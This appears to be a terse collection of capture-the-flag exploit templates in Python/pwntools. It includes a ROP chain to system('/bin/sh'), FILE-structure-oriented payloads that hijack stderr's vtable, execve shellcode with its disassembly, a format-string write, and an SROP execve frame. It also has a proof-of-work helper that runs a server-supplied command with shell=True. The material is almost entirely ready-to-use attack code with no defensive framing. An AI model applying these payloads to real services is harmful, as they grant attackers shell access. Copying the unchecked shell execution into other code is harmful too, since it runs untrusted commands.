# rdi
log.success("libc :-----> " + hex(libc.address))
system_addr = libc.symbols.get("system")
binsh_addr = next(libc.search("/bin/sh"))
pop_rdi = next(libc.search(asm("pop rdi; ret")))
# ret = next(libc.search(asm("ret"))) 为啥有时候不行呢？
ret = rop.find_gadget(['pop rdi', 'ret'])[0] 
environ = libc.symbols["__environ"]

payload = p64(pop_rdi) + p64(binsh_addr)
payload += p64(system_addr)



# FSOP1
vtable = libc.sym._IO_wfile_jumps
io_file = libc.sym._IO_2_1_stderr_
payload = flat(
    0x687320,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, libc.sym.system, 0x00, 0x00, 0x00, 0x00,
    0x0, 0x0, 0x00, libc.bss()+0x100, 0x00,
    io_file+0x20, io_file-0x20,
    0x0, 0x0, 0x0, (io_file-0xe0)+0xc0, 0x0, 0x0,
    vtable)

# FSOP2
file = FileStructure(0)
file.flags = u64(p32(0xfbad0101) + b";sh\0")
file._IO_save_end = libc.sym["system"]
file._lock = stderr_adr - 0x10
file._wide_data = stderr_adr - 0x10
file._offset = 0
file._old_offset = 0
payload = b"\x00"*24 + p32(1) + p32(0) + p64(0)
payload += p64(libc.symbols["_IO_2_1_stderr_"] - 0x10)
payload += p64(libc.symbols["_IO_wfile_jumps"] + 0x18 - 0x58)
file.unknown2 = payload

bytes(file)

# shellcode
shellcode = asm(shellcraft.amd64.linux.sh())
"""
   0:   6a 68                   push   0x68
   2:   48 b8 2f 62 69 6e 2f 2f 2f 73   movabs rax, 0x732f2f2f6e69622f
   c:   50                      push   rax
   d:   48 89 e7                mov    rdi, rsp
  10:   68 72 69 01 01          push   0x1016972
  15:   81 34 24 01 01 01 01    xor    DWORD PTR [rsp], 0x1010101
  1c:   31 f6                   xor    esi, esi
  1e:   56                      push   rsi
  1f:   6a 08                   push   0x8
  21:   5e                      pop    rsi
  22:   48 01 e6                add    rsi, rsp
  25:   56                      push   rsi
  26:   48 89 e6                mov    rsi, rsp
  29:   31 d2                   xor    edx, edx
  2b:   6a 3b                   push   0x3b
  2d:   58                      pop    rax
  2e:   0f 05                   syscall
"""

# magic gadget
# 0x000000000040111c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret


# copy jail libc
sudo docker cp xx:/srv/usr/lib64/ld-linux-x86-64.so.2 ./
sudo docker cp xx:/srv/lib/x86_64-linux-gnu/libc.so.6 ./



# pow
if "pow" in sys.argv:
    io.recvuntil(b"Submit the token generated by `")
    cmd = io.recvuntil(b"`", drop=True).decode()
    token = subprocess.check_output(cmd, shell=True).strip()
    io.sendline(token)


# format
%*9$d%100c%13$n


# SROP
```
frame = SigreturnFrame()
frame.rdi = 0x4048f4
frame.rsi = 0
frame.rdx = 0
frame.rax = constants.SYS_execve
frame.rsp = syscall
frame.rip = ret
```